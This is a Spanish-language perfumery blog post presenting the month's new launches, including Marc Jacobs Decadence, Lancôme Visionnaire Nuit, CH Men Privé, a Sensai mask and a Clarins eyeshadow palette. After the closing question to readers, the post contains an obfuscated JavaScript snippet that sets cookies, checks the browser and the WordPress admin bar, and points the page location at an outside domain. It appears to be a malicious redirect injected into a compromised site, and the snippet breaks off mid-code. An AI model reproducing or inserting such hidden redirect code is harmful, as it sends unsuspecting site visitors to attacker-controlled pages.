perfumerías online

Como cada mes hoy toca nuestra sección de novedades del mes en la que os mostraremos aquellos productos que han sido lanzamientos recientes y que al menos debemos conocer.

Comenzamos con el nuevo perfume del prestigioso diseñador Marc Jacobs, como todos sus perfumes Decadence no nos dejará indiferentes.

Se trata del perfume de mujer Decadence de Marc Jacobs la primera fragancia madura del diseñador. Marc Jacobs busca en el perfume Decadence a una mujer sexy llena de sofisticación. La modelo Adriana Lima elegida imagen del perfume representa a esa mujer que Jacobs quiere transmitir. En cuanto al perfume encontramos la nariz de la perfumista Annie Buzantian que ha conseguido crear un aroma oriental floral que enamora.

marc-jacobs-decadence-eau-de-parfum

 

 

 

 

 

 

 

 

 

 

 

 

Entre sus notas de salida encontramos: ciruela, azafrán e iris, siguiendo como notas de corazón ese toque floral que nos proporcionan las rosas, el jazmín o la raíz de lirio. Para finalizar sus acordes de ámbar, vetiver y papiro acaban de poner la guinda a este maravilloso perfume.

Su envase como ya nos tiene acostumbrados el diseñador es llamativo, sensual y muy original. El diseñador busca el glamour representado en un bolso de mano verde esmeralda con pitón, el detalle de la cadena dorada y la bola negra.

Encontrarás este Eau de Parfum disponible en 30 ML, 50 ML y 100 ML.

Lancôme y su gama Visionnaire lanza su nueva crema antiarrugas Visionnaire Nuit Beauty Sleep Perfector. Se trata de un gel en aceite que promete disminuir los signos de cansancio durante el sueño aprovechando la capacidad de recuperación de la piel logrando rasgos descansados y una piel lisa, elástica y brillante al despertarnos. En su fórmula encontramos unas pequeñas gotas de aceite suspendidas en el gel que buscan generar una sensación de frescor, nutre nuestra piel de forma duradera. Este producto está recomendado para todo tipo de pieles.

lancome-visionnaire-nuit

 

 

 

 

 

 

 

 

 

 

 

 

 

Seguimos con lo último de Carolina Herrera se trata del perfume de hombre CH Men Privé. Un perfume cálido y lujoso, con notas de whisky y de piel provocativo, moderno y rico. CH Men Privé es la verdadera esencia de un seductor perfecto. El complemento perfecto para un hombre de mundo que puede impresionar fácilmente por su cuenta, pero con CH Men Privé, la seducción es completa. El hombre CH Privé sabe lo que quiere y cómo conseguirlo.

Entre sus notas de salida encontramos frescas y cítricas notas en forma de pomelo y lavanda con notas especiadas de salvia, tomillo rojo y cardamomo. Continuando con lujosas notas de whisky y finalizando con notas de cuero, benzoína y tonka.

perfume ch men privee

 

 

 

 

 

 

 

 

 

 

 

 

Desde Kanebo/Sensai nos presentan Extra Intensive Mask una mascarilla perfecta para prepararnos para el invierno y tener lista nuestra piel.

kanebo-sensai-extra-intensive-mask

 

 

 

 

 

 

 

 

 

 

 

Con este tratamiento antiedad obtendremos una piel sedosa envidiable. Un masaje reparador que incluso relaja hasta el alma y que favorecerá su descanso. EXTRA INTENSIVE MASK contrarresta los signos de la edad a la vez que aporta energia a la piel favoreciendo una piel sedosa. En tan solo una noche despertará con una piel más suave. Su mezcla de aceites vegetales que se funden con la temperatura de la piel y la envuelven para alisarla y aportarle una hidratación duradera. La mascarilla, con su relajante fragancia floral, revitaliza la piel aportándole energía y dejándola sedosa.

Y para acabar para las noches otoñales os sugerimos la nueva paleta de sombras de Clarins con tonos espectaculares que te permitirán lograr un look ideal cualquiera que sea tu color de ojos.

clarins-palette-colection

 

 

 

 

 

 

 

 

 

 

 

Cuéntanos, ¿Qué te parecen las novedades de este mes? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone